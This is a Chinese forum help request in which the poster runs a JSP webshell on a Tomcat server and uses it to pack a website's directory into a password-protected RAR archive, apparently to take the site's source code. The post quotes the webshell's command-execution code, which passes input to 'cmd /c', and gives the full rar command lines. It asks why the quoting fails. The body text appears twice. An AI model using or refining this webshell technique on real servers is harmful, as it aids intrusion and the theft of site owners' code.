-
-
[求助]jsp 版webshell 压缩源码提示路径错误
-
发表于: 2012-2-11 09:36 2245
-
首先,找到rar安装路径:"C:\Program Files\WinRAR\rar.exe " 然后在webshell的命名执行行中输入:
"C:\Program Files\WinRAR\rar.exe " a -r -hp[possible] "C:\Program Files\Apache Software Foundation\Tomcat 6.0\webapps\ZTBWZ\bakup.rar" "C:\Program Files\Apache Software Foundation\Tomcat 6.0\webapps\ZTBWZ\"
由于含有空格 都是用双引号扩上,但是发现执行失败,在本地测试,发现失败,但是该语句直接在cmd下可以运行成功,后来看一下webshell的实现过程,
try
{
//out.println(strCmd);
Process p=Runtime.getRuntime().exec("cmd /c "+strCmd);
BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
while((line=br.readLine())!=null)
{
sbCmd.append(line+"\r\n");
}
}
catch(Exception e)
{
System.out.println(e.toString());
}
}
else
{
strCmd = "set";
}
使用cmd /c 加上输入的命令,在命令行执行。因此在命令行测试
cmd /c "C:\Program Files\WinRAR\rar.exe " a -r -hp[possible] "C:\Program Files\Apache Software Foundation\Tomcat 6.0\webapps\ZTBWZ\bakup.rar" "C:\Program Files\Apache Software Foundation\Tomcat 6.0\webapps\ZTBWZ\"
发现失败,因此想到,应该不加入cmd /c 在webshell中修改 去掉cmd /c 可以正常压缩了.... 但是不知道为什么不能使用cmd /c 求指教 谢谢
"C:\Program Files\WinRAR\rar.exe " a -r -hp[possible] "C:\Program Files\Apache Software Foundation\Tomcat 6.0\webapps\ZTBWZ\bakup.rar" "C:\Program Files\Apache Software Foundation\Tomcat 6.0\webapps\ZTBWZ\"
由于含有空格 都是用双引号扩上,但是发现执行失败,在本地测试,发现失败,但是该语句直接在cmd下可以运行成功,后来看一下webshell的实现过程,
try
{
//out.println(strCmd);
Process p=Runtime.getRuntime().exec("cmd /c "+strCmd);
BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
while((line=br.readLine())!=null)
{
sbCmd.append(line+"\r\n");
}
}
catch(Exception e)
{
System.out.println(e.toString());
}
}
else
{
strCmd = "set";
}
使用cmd /c 加上输入的命令,在命令行执行。因此在命令行测试
cmd /c "C:\Program Files\WinRAR\rar.exe " a -r -hp[possible] "C:\Program Files\Apache Software Foundation\Tomcat 6.0\webapps\ZTBWZ\bakup.rar" "C:\Program Files\Apache Software Foundation\Tomcat 6.0\webapps\ZTBWZ\"
发现失败,因此想到,应该不加入cmd /c 在webshell中修改 去掉cmd /c 可以正常压缩了.... 但是不知道为什么不能使用cmd /c 求指教 谢谢
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
赞赏
他的文章
看原图
赞赏
雪币:
留言: